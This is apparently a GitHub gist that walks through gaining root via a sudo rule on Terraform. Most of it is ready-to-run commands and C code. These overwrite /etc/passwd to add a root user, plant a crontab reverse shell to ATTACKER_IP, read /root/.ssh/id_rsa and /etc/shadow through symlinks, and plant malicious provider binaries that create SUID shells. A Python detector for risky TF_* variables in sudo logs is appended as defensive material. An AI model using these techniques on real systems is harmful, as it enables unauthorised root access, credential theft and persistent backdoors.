@strikoder
Last active January 11, 2026 16:10
Privilege escalation using sudo on Terraform through various methods

Terraform Sudo Privilege Escalation

Method 1: File Overwrite via Symlink Attack

Option A: /etc/passwd (Add root user)

```bash
# Generate MD5 password hash
openssl passwd -1 abcd1234
# Example output: $1$xyz$abc123...

# Create malicious passwd file
mkdir -p /tmp/root/examples
cat /etc/passwd > /tmp/root/examples/passwd
echo 'strikoder:$1$xyz$abc123...:0:0:root:/root:/bin/bash' >> /tmp/root/examples/passwd

# Create symlink in Terraform's output directory (e.g., docker/public)
ln -s /etc/passwd /home/jeremy/docker/previous/public/examples/passwd # terraform destination path

# Trigger with sudo terraform - it copies from /tmp/root/examples/passwd to the symlink
TF_VAR_source_path=/tmp/root/examples/passwd sudo /usr/bin/terraform -chdir=/opt/examples apply

# After execution: su strikoder
```

Option B: /etc/crontab (Persistent backdoor)

```bash
# Craft malicious crontab
cat /etc/crontab > /tmp/root/examples/crontab
echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' >> /tmp/root/examples/crontab

# Create symlink
ln -s /etc/crontab /home/jeremy/docker/previous/public/examples/crontab # destination path

# Trigger with terraform - reverse shell every minute
# (source path points at the crafted crontab, not the passwd file from Option A)
TF_VAR_source_path=/tmp/root/examples/crontab sudo /usr/bin/terraform -chdir=/opt/examples apply
```

Method 2: Reading Sensitive Files

Read files normally restricted to root (SSH keys, shadow file, etc.)

```bash
mkdir -p /tmp/root/examples

# Symlink to target file
ln -s /root/.ssh/id_rsa /tmp/root/examples/key # or ln -s /etc/shadow /tmp/root/examples/shadow

# Configure Terraform to read the symlinked file
TF_VAR_source_path=/tmp/root/examples/key sudo terraform apply

cat output_file_in_destination_path  # check destination_path
```

Method 3: Malicious Provider Binary

Hijack Terraform's provider mechanism to execute arbitrary code as root.

```bash
# Create malicious provider
cat > terraform-provider-example << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootshell
chmod +s /tmp/rootshell
EOF

chmod +x terraform-provider-example

# Option A: Via .terraformrc configuration
mkdir -p ~/.terraform.d/plugins
mv terraform-provider-example ~/.terraform.d/plugins/
cat > ~/.terraformrc << 'EOF'
provider_installation {
  filesystem_mirror {
    path    = "/home/USER/.terraform.d/plugins"
  }
}
EOF

# Option B: Via environment variable
export TF_CLI_CONFIG_FILE="/path/to/malicious/config"

# Trigger execution
sudo terraform init
sudo terraform apply

# Execute SUID shell
/tmp/rootshell -p
```

Method 4: Malicious Provider Template (Compiled)

A more sophisticated variant of provider hijacking using a compiled binary instead of a shell script.

```c
// exploit.c
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash /tmp/rootbash");
    system("chmod +s /tmp/rootbash");
    return 0;
}
```

```bash
# Compile as fake provider
gcc exploit.c -o terraform-provider-example
chmod +x terraform-provider-example

# Place in provider directory
mkdir -p /tmp/malicious-plugins
mv terraform-provider-example /tmp/malicious-plugins/

# Execute with terraform
sudo /usr/bin/terraform -chdir=/opt/examples init
sudo /usr/bin/terraform -chdir=/opt/examples apply

# Use SUID shell
/tmp/rootbash -p
```
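Every method above relies on a non-root user steering a root terraform run through TF_* variables or user-writable paths, and sudo records command-line environment assignments in its ENV= field. The following detection pass over sudo log lines is an added example (not part of the gist), with constructed sample lines in approximately sudo's default log format and hypothetical prefix lists as the heuristic.

```python
"""Flag sudo invocations of terraform that carry caller-controlled input."""
import os

# Env variables that let the caller steer what root-terraform reads or executes.
RISKY_ENV_PREFIXES = ("TF_VAR_", "TF_CLI_CONFIG_FILE", "TF_PLUGIN_CACHE_DIR", "TF_DATA_DIR")
# Locations an unprivileged user can typically write to; contents there are untrusted.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed sample sudo log lines (not real captures), mirroring the techniques above.
SAMPLE_SUDO_LOG = """\
jeremy : TTY=pts/0 ; PWD=/home/jeremy ; USER=root ; ENV=TF_VAR_source_path=/tmp/root/examples/passwd ; COMMAND=/usr/bin/terraform -chdir=/opt/examples apply
jeremy : TTY=pts/0 ; PWD=/home/jeremy ; USER=root ; COMMAND=/usr/bin/terraform -chdir=/opt/examples plan
jeremy : TTY=pts/1 ; PWD=/home/jeremy ; USER=root ; ENV=TF_CLI_CONFIG_FILE=/home/jeremy/evil.tfrc ; COMMAND=/usr/bin/terraform init
alice : TTY=pts/2 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
"""

def parse_sudo_line(line):
    """Split 'user : K=V ; K=V ; ...' into (user, {K: V})."""
    user, _, rest = line.partition(" : ")
    fields = {}
    for part in rest.split(" ; "):
        key, _, value = part.partition("=")
        fields[key] = value
    return user.strip(), fields

def analyze_sudo_log(text):
    """Return one finding per root terraform run with suspicious env or path input."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, f = parse_sudo_line(line)
        argv = f.get("COMMAND", "").split()
        if not argv or os.path.basename(argv[0]) != "terraform" or f.get("USER") != "root":
            continue
        reasons = []
        # ENV= holds space-separated VAR=value pairs passed on the sudo command line.
        for assignment in f.get("ENV", "").split():
            name, _, value = assignment.partition("=")
            if name.startswith(RISKY_ENV_PREFIXES):
                reasons.append(f"env {name} controls terraform input")
            if value.startswith(USER_WRITABLE_PREFIXES):
                reasons.append(f"env {name} points at user-writable {value}")
        for arg in argv[1:]:
            path = arg.split("=", 1)[-1]
            if path.startswith(USER_WRITABLE_PREFIXES):
                reasons.append(f"argument {arg} references user-writable path")
        if reasons:
            findings.append({"user": user, "command": f["COMMAND"], "reasons": reasons})
    return findings
```

A provider mirror configured through ~/.terraformrc leaves no ENV= trace, so this check complements, rather than replaces, reviewing the sudoers rule that grants terraform (SETENV and env_keep settings in particular).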